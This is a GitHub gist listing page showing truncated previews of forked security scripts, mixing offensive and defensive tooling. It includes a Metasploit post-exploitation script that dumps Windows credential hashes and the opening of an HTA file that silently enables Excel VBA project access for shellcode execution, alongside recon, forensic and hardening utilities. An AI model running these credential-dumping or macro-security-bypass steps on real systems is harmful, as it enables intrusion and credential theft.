alibay7’s gists

alibay7 / metasploit-post-exploitation-script-for-windows.rc

Created March 28, 2018 21:31 — forked from 1N3/metasploit-post-exploitation-script-for-windows.rc

Metasploit Post Exploitation Script For Windows

	setg SESSION 1
	use post/windows/gather/smart_hashdump
	run
	use post/windows/gather/credentials/domain_hashdump
	run
	use post/windows/gather/credentials/mcafee_vse_hashdump
	run
	use post/windows/gather/credentials/mssql_local_hashdump
	run
	use post/windows/gather/hashdump

alibay7 / Sn1per v4.4 (Beta)

Created March 28, 2018 21:27 — forked from 1N3/Sn1per v4.4 (Beta)

	#!/bin/bash
	# + -- --=[Sn1per by 1N3@CrowdShield
	# + -- --=[http://crowdshield.com
	#

	VER="4.4"
	BROWSER="firefox" # SET DEFAULT BROWSER
	INSTALL_DIR="/usr/share/sniper"
	PLUGINS_DIR="/usr/share/sniper/plugins"
	CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"

alibay7 / strings.py

Created March 28, 2018 21:24 — forked from trietptm/strings.py

Extract ASCII and Unicode strings using Python.

	#!/usr/bin/env python

	##########################################################################################################
	##
	## Like steroids for your strings!
	##
	## Original idea: @williballenthin
	## Original link: https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
	##
	## Lipstick and rouge by: @herrcore

alibay7 / detect_fresh_pe.py

Created March 28, 2018 21:21 — forked from trietptm/detect_fresh_pe.py

	import datetime
	import os
	import sys
	import pefile
	from scapy.all import *
	import scapy_http.http
	import tempfile

	TIME_THRESHOLD = datetime.timedelta(days=3)

alibay7 / exploit.py

Created March 28, 2018 21:06 — forked from AndrewFasano/exploit.py

McAfee PoC

	#!/bin/python3
	import time
	import requests
	import os
	import sys
	import re
	import threading
	import subprocess
	from http.server import BaseHTTPRequestHandler, HTTPServer
	from socketserver import ThreadingMixIn

alibay7 / delete_default_hidden_shared_folders.bat

Created March 28, 2018 21:03 — forked from trietptm/delete_default_hidden_shared_folders.bat

Delete All default hidden shared folders from Windows

	@echo off

	net share /delete C$ /y
	net share /delete D$ /y
	net share /delete E$ /y
	net share /delete F$ /y
	net share /delete G$ /y
	net share /delete H$ /y
	net share /delete I$ /y
	net share /delete J$ /y

alibay7 / ioc-generator.ps1

Last active March 28, 2018 21:02 — forked from trietptm/ioc-generator.ps1

PowerShell IOCs generator

	dir . \| Foreach-Object{
	$file = $_
	$hash = Get-FileHash $file -Algorithm MD5
	$fileinfo = Get-Item $file

	New-Object -TypeName PSObject -Property @{
	VersionInfo = $fileinfo.VersionInfo
	LastWriteTime = $fileinfo.LastWriteTime
	Length = $fileinfo.Length
	Algorithm = $hash.Algorithm

alibay7 / reclaimWindows10.ps1

Created March 28, 2018 20:59 — forked from trietptm/reclaimWindows10.ps1

"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetery, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via https://github.com/Disassembler0 (different defaults)

	##########
	# Win10 Initial Setup Script
	# Author: Disassembler <[email protected]>
	# Version: 1.7, 2016-08-15

	# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/

	# THIS IS A PERSONALIZED VERSION
	# This script leaves more MS defaults on, including MS security features.
	# Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1

alibay7 / offsec.md

Created March 28, 2018 20:52 — forked from trietptm/offsec.md

Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance
- Passive/Semi-Passive
  - Tools
Discover - https://github.com/leebaird/discover

alibay7 / CalcExcel.hta

Created March 28, 2018 20:32 — forked from trietptm/CalcExcel.hta

Shellcode Execution Via HTA

	<html>
	<head>
	<script>
	var objExcel = new ActiveXObject("Excel.Application");
	objExcel.Visible = false;
	var WshShell = new ActiveXObject("WScript.Shell");
	var Application_Version = objExcel.Version;//Auto-Detect Version
	var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
	WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
	var objWorkbook = objExcel.Workbooks.Add();